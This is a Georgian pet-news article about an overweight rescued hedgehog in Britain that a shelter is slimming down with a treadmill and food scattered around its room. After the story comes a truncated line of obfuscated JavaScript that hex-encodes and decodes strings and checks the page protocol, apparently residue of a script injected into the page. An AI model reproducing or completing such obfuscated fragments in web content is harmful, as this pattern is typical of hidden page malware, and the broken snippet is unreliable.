დიდ ბრიტანეთში მსუქანი ზღარბი დიეტაზე დასვეს
დიდ ბრიტანეთში მსუქანი ზღარბი დიეტაზე დასვეს
ბრიტანელ ზღარბს, სახელად დიდი (The Big One), სერიოზული პრობლემები აქვს. ის 8 კილოგრამზე მეტს იწონის, რაც მისი სახეობის წარმომადგენლის ჩვეულ წონას სამჯერ აღემატება.

Mirror-ის ცნობით, ცხოველს გორგალივით მოხვევაც კი არ შეუძლია. მას ზედმეტი წონა უშლის ხელს. პატრონებმა გადაწყვიტეს, რომ მათმა ბინადარმა დიეტა უნდა დაიცვას.


Zooclub
მარცხნივ ჩვეულებრივი ზღარბია, მარჯვნივ კი ჩვენი ამბის გმირი.

დიდი ტყეში იპოვეს. ცხოველთა დამცველებმა, რომლებიც ამჟამად 60 ზღარბს უვლიან, ის დაჭრილი იპოვეს ტყეში. გადარჩენილი პატარა დასახლდა სახლში და შესანიშნავი ცხოვრებით დაიწყო ცხოვრება: იკვებებოდა ძაღლის საჭმლით და ცხოველებისთვის
განკუთვნილი ჩიფსებით.

ორგანიზაციის უფროსი, დერრენ სკვაირსი ზღარბის წონაში მომატების მიზეზად იმას ასახელებს, რომ ზღარბი თითქმის
აღარ მოძრაობდა, როდესაც თბილ გარემოში მოხვდა. 4 თვის განმავლობაში ის საგრძნობლად გასუქდა. ექსპერტის თქმით, ველურ პირობებში ზღარბები საკვების საძებნელად ღამით რამოდენიმე კილომეტრს მაინც დარბიან და ასე წვავენ კალორიებს.

დიდს არაფრად სჭირდებოდა საჭმლის საშოვნელად სირბილი. მას ხელიდან კვებავდნენ. სკვაირსი შიშობს, რომ თუ ზღარბს ტყეში გაუშვებენ იმ მდგომარეობაში, როგორშიც ახლაა, მალე დაიღუპება, რადგან თავს ვერ დაიცავს.

იმისთვის, რომ ზღარბს პირველი ფორმა დაუბრუნონ, თავშესაფრის თანამშრომლებმა სარბენ ბილიკზე დააყენეს, იქ დადგეს ასევე გალია. მისი საკვები კი ოთახის სხვადასხვა კუთხეში განათავსეს.

ეს აიძულებს ზღარბს, რომ მეტი იაროს და დაიკლოს ზედმეტი წონა, სანამ მას ბუნებრივ არეალში დააბრუნებენ.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?